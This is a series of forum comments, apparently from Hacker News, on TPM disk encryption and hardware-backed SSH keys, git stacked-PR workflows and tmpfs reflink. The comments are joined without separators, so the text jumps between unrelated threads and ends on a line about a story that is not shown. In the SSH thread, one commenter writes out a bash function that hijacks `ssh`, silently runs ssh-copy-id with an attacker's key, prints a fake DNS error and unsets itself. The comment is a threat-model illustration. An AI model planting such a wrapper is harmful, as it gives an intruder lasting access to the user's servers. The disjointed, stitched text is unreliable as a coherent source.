That's fine, but realize you are not representative of the average tech worker, or indeed of any white-collar worker such as those we are talking about in this post.
TPMs can be useful to you as an individual if you're trying to protect against an evil maid attack. Although I think Linux isn't quite there yet with its support for it. The systemd folks are making progress though.
That only helps if you set a strong password as your TPM PIN. Otherwise it's hardware-bound with no access control, and just as susceptible to evil maid attacks as storing the keys directly in a file.
I don't see how entering a passphrase into a compromised boot loader/kernel/initramfs is as safe as a measured boot with TPM providing the decryption key only if nothing seems to have been tampered with. Can you elaborate please?
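For concreteness, the kind of setup I have in mind is roughly this with systemd-cryptenroll (the device path and PCR selection are only examples, pick your own):

    # Bind a LUKS volume to the TPM: the key is released only if the
    # measured boot state (here PCR 7, the Secure Boot policy) is
    # unchanged, and it is additionally gated behind a PIN.
    systemd-cryptenroll /dev/nvme0n1p2 \
        --tpm2-device=auto \
        --tpm2-pcrs=7 \
        --tpm2-with-pin=yes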
I said this elsewhere in the thread, but to repeat here:
Can you explain why securing the ssh keys on a host that was fully compromised like that is anything but theater? Fine, you can't get the key out. You can just run the command directly.
Again, there are use cases where TPMs provide value to authenticate specific devices. But they are not and never have been about "keeping secrets". Your secrets are trash once the device is compromised.
Well I wasn't talking about ssh keys at all - that's where the misunderstanding comes from. I was simply trying to counter your claim that TPMs are never ever useful for individuals. They can be useful to individuals worried about having their boot tampered with.
I absolutely agree that they do zilch to protect your SSH keys. Hardware security keys that need physical confirmation of presence are much better for that use-case.
They can use the key as long as they can access your computer, but they shouldn't be able to get the secret key out of the TPM or Yubikey and use it elsewhere while your computer is off. That's the main point of HSMs.
I know the title says "in your TPM chip" but the method described does not store your private key in the TPM, it stores it in a PKCS keystore which is encrypted by a key in your TPM. In actual use the plaintext of your private ssh key still shows up in your ssh client for validation to the remote host.
The recommended usage of a yubikey for ssh does something similar as otherwise your key consumes one of the limited number of slots on the key.
Yes, with TPM and yubikey you have the option to store the per-key material on disk, encrypted by the TPM. But the way this is then used is that the PKCS software sends that encrypted blob AND the requested operation, and gets only the output back. The CPU doesn't get the SSH private key back. Just the output of the RSA operation using the key.
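Roughly, with OpenSSH's PKCS#11 support and the tpm2-pkcs11 module it looks like this (the library path varies by distro, this one is just an example):

    # List the public halves of the keys the module exposes; the private
    # halves stay behind the TPM.
    ssh-keygen -D /usr/lib/libtpm2_pkcs11.so

    # Authenticate with one of those keys; the module forwards the signing
    # request to the TPM and only the signature comes back.
    ssh -I /usr/lib/libtpm2_pkcs11.so user@host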
I really don't think this is true for FIDO2 like Yubikey. My understanding is that your ssh client gets a challenge from the server, reads the key "handle" from the private key file, and sends both to Yubikey. The device then combines its master key with the handle to get the actual private key, signs the challenge, and gives the result back to your ssh client. At no point does the private key leave the Yubikey.
I don't know if you are missing anything. That's why I'm asking and making statements about how I understand the various processes to work. I want to understand how it is that the only device that interacts with the yubikey/tpm, when compromised, can't be subverted to the attackers ends.
Perhaps one extra bit to add: you've mentioned consuming slots on the device - that's what happens if you generate a resident key. Those keys live on the device and can be used from any computer you plug them into, without having to retain/copy any files. A non-resident key, on the other hand, is derived from the master key on the device, and a "handle" that's stored as a file on your computer. You can have as many as you want, but if you lose either the file or the hardware device, they're gone.
(Others in the thread have confirmed that both resident and non-resident keys never leave the hardware. If you generate one that requires touch, they're fairly secure - you need physical presence and confirmation for every operation.)
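In OpenSSH terms, the two flavours look like this (filenames are the defaults):

    # Non-resident (default): the device derives the private key from its
    # master secret plus the handle written to ~/.ssh/id_ed25519_sk; lose
    # either the file or the device and the key is gone.
    ssh-keygen -t ed25519-sk

    # Resident: stored in one of the device's limited slots; can later be
    # loaded on any machine with `ssh-keygen -K`.
    ssh-keygen -t ed25519-sk -O resident

Touch is required by default for both, unless the key is generated with `-O no-touch-required`.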
This article's method is bad, basically the same as systemd-creds (not itself bad, just extremely compatible). Take a look at tpm-ssh-agent or gnupg for how to do that part the right way (the part they don't do right is binding/signing to PCRs, which is just low-hanging fruit in this day and age...)
Yeah but they already mentioned that they expect the attacker to hijack your ssh command so you'll touch it yourself, thinking you're authorizing something else than you actually are.
It does mean that they can't use the key a thousand times. But once? Yeah sure.
> hijack your ssh command so you'll touch it yourself, thinking you're authorizing something else than you actually are.
That doesn’t do anything at all.
1. If the attacker is redirecting you to a different host then ssh will simply refuse to connect due to known_hosts (I guess they could have added to that file too, redirected you to a honeypot, and hoped you'd run “sudo” before realizing; but at that point they could just hijack “sudo” itself on the local machine)
2. If the attacker is trying to let you connect and eavesdrop on your connection to steal credentials, that also doesn't work, as the SSH handshake is not vulnerable to replay attacks
The attacker could trick you into signing something I guess but then that still doesn’t do anything because secrets are not divulged at any point
I guess if the yubikey is also used for `sudo` then your attack makes more sense, as the attacker could prompt you to authenticate a sudo request when you call the evil `ssh`
Okay let me elaborate how I envision that attack to work:
1. attacker wants to use your yubikey-backed ssh key, let's say for running ssh-copy-id once with their own key so they can gain access to your server
2. thus they need to trick you into touching the key when they run that command
3. the best way to trick you is to wait until you do something where you'd normally need to touch that key yourself
4. so they alias ssh to a script that detects when you're trying to connect to this server yourself and invokes ssh-copy-id instead (see the sketch below), which prompts you to touch the yubikey, and you do
5. spit out a reasonable looking error (something that makes you think "bloody DNS, it's always DNS, innit" or something silly like that); then they undo the alias so you succeed on the next try and suspect nothing
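A rough sketch of what that step-4 wrapper could look like (purely illustrative; the host name and key path are made up):

    # Hypothetical function dropped into your shell: intercepts one ssh
    # invocation to the target host, runs ssh-copy-id with the attacker's
    # key while you think you're authorising your own login, prints a
    # plausible error, then stops interfering.
    ssh() {
        if [[ "$*" == *"prod-server"* ]]; then
            command ssh-copy-id -i /tmp/.evil.pub prod-server >/dev/null 2>&1
            echo "ssh: Could not resolve hostname prod-server: Temporary failure in name resolution" >&2
            unset -f ssh    # only needed once; your next attempt works normally
            return 255
        fi
        command ssh "$@"
    }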
Indeed, that was my point exactly a couple posts up the thread. :-)
> you may realise that something wrong happened
I think I can iterate on the exact mechanics to make this less likely. I mean it's getting off-topic but the one thing that comes to mind is to enable ControlMaster for all ssh connections which allows any second ssh invocation to skip the auth and just re-use the existing connection. ssh-copy-id is near instant then and doesn't ask anything.
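For reference, I mean something like this in ~/.ssh/config (the path and timeout are just my preferences):

    Host *
        ControlMaster auto
        ControlPath ~/.ssh/cm-%r@%h:%p
        ControlPersist 10m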
At that point you might—rightly so—argue that they're no longer tricking the user into authorising a different operation. Just a reminder that if someone can run code as your local user, they can easily and sneakily gain access elsewhere. Even if you need a yubikey touch to connect there.
The original attack idea of timing the yubikey touch for when you normally expect to touch it might still be relevant for a scenario like ssh-agent forwarding to a malicious box. They can't run code as your local user, but can still perhaps trigger the agent to interact with the yubikey. Maybe.
It's also a bit outdated. OpenSSH supports FIDO2 natively, so all this gnupg stuff is unnecessary for ssh. One can even use yubikey-backed ssh keys for commit signing.
And the best thing is that you can create several different ssh keys this way, each with a different password, if that's something you prefer. Then you need to type the password _and_ touch the yubikey.
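For example (the key file name is just a placeholder):

    # Generate a yubikey-backed key natively; ssh-keygen prompts for an
    # optional passphrase on the key file.
    ssh-keygen -t ed25519-sk -f ~/.ssh/id_ed25519_sk_example

    # Reuse the same key for signing commits.
    git config --global gpg.format ssh
    git config --global user.signingkey ~/.ssh/id_ed25519_sk_example.pub
    git config --global commit.gpgsign true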
This assumes that the server is running a recent enough OpenSSH, configured with this enabled. For Linux servers, sure. For routers, less obviously so.
Yeah, but more importantly, neither will those multi-million-dollar routers your ISP uses. Nor their ten thousand thousand-dollar switches.
And they won't be replacing these just because they're missing FIDO. And they can't "just" be upgraded because they aren't necessarily just Linux boxes in a trenchcoat. Nor are they necessarily running any version of OpenSSH.
These work flawlessly with the KeepassXC ssh-agent integration. My private keys are password protected, saved securely inside my password vault, and with my ssh config setup, I just type in the hostname and tap my Yubikey.
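The ssh config part is nothing fancy, roughly this (names are made up):

    # KeepassXC's ssh-agent integration loads the key from the vault into
    # ssh-agent while the vault is unlocked; the alias just maps a short
    # name to the right host and user.
    Host prod
        HostName prod.example.com
        User deploy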
Many of those are "Merge branch 'master' into armanc/subtitle-sync-refactor". Rebasing the PR on top of master would bring that down to like 15 or something.
It's awesome that they're adding a UI for stacked branches¹! The UX of the CLI tool seems weird, though. Why do I need to explicitly create and add branches to the stack if all I really want is to open PRs from my commits? Here's the workflow that I built for myself instead:
∙ `git checkout -b feature-branch-xyz`
∙ make a few commits, perhaps some fixups, rebase, whatever
∙ start tig, look at the history, decide at which points I want to break the branch into stacked PRs, and mark those points using shift-s (which calls my own `git gh-stack branch create $commit` and creates a specially named branch there)
∙ `git gh-stack sync` — collects all the specially named branches, builds a graph of how they're stacked on one another, pushes them, opens stacked PRs
GitHub has had some "support" for stacked PRs for a while, so merging the first one to main will automatically change the target branch of the second to main.
If I need to change anything, I can just `git rebase --interactive --update-refs`, amend commits, split commits, rearrange commits, and then running `git gh-stack sync` will update the PRs for me. If I split a commit in the middle and shift-s to mark it, it will open an extra PR and restack everything to update the order.
Furthermore, the "PR stack" doesn't actually need to be a stack (linear chain), it can be a tree. If I know that some commits are independent of the rest, I don't need to create a separate stack, I just create another local branch, mark PR-ready commits with shift-s, and `git gh-stack sync` will do the right thing. If I need to rebase the whole tree on top of current main, then `git rebase -i --rebase-merges --update-refs` does the job.
I guess what I'm saying is that as someone who's been using git since its inception, it feels much more natural to just do everything in git, and then have a single command that pushes my work to GitHub. And I think this might work even better with jujutsu — just point `git gh-stack sync` at the branches jj makes and it'll make a stack/tree of PRs out of them. :-)
¹) I mean, I'd much rather they added a UI for reviewing PRs commit-by-commit, with the option to approve/request-changes on each, and the possibility to merge the first few approved ones while continuing work on the rest… But in a world of almost every $dayjob insisting on squash-merging, a UI for stacked PRs is a total game changer, positively.
They haven't fixed the fork issue; the FAQ clarifies this. I suspect the target audience is squash-merging corpos. Everyone else can just do normal PRs with atomic commits reviewed individually...
Assuming you're currently on the most recent branch (furthest from the trunk), `git rebase -i --update-refs trunk` will rebase all the intermediate branches. If you need to make a change to the first branch nearest the trunk, either use `edit` in the interactive rebase, or make a fixup commit and enable autosquash for the rebase. The `--update-refs` flag makes sure that all the intermediate branches get updated during the rebase.
Then, to push them all, something like `git push origin 'refs/heads/yourname/*'` will push all branches prefixed with `yourname/`. It's a bit stupid that one can't just do `git push 'yourname/*'` though.
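A minimal example of the fixup route (the SHA is a placeholder):

    # Record a fix that belongs to an earlier commit on the first branch:
    git commit --fixup=<sha-of-the-commit-to-amend>

    # Rebase onto trunk, squash the fixup into place, and move every
    # intermediate branch along with its commit:
    git rebase -i --autosquash --update-refs trunk

    # Push all the stacked branches in one go (force needed after a rebase):
    git push --force-with-lease origin 'refs/heads/yourname/*'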
I tried to do something similar well over a decade ago during an internal hackathon (the motivation back then being speeding up destructive integration tests). My idea was to have the memory be a file on tmpfs, and simply `cp --reflink` to get a copy-on-write clone. Then you wouldn't need to bother with userfaultfd or slow storage as the kernel would just magically do the right thing.
Unfortunately, the Linux kernel didn't support reflink on tmpfs (and still doesn't), and I'm not genius enough to have been able to implement that within 24 hours. :-)
I still believe it'd be nice to implement reflink for tmpfs, though. It's the perfect interface for copy-on-write forking of VM memory.
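To illustrate the interface (this already works on filesystems with reflink support such as XFS or btrfs, just not on tmpfs):

    # Back the guest memory with a file, then take a copy-on-write clone;
    # only pages written after the clone get physically duplicated.
    truncate -s 4G memory.img
    cp --reflink=always memory.img snapshot.img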
(yes that's a real story from my career, and the company was 100+ employees at the time)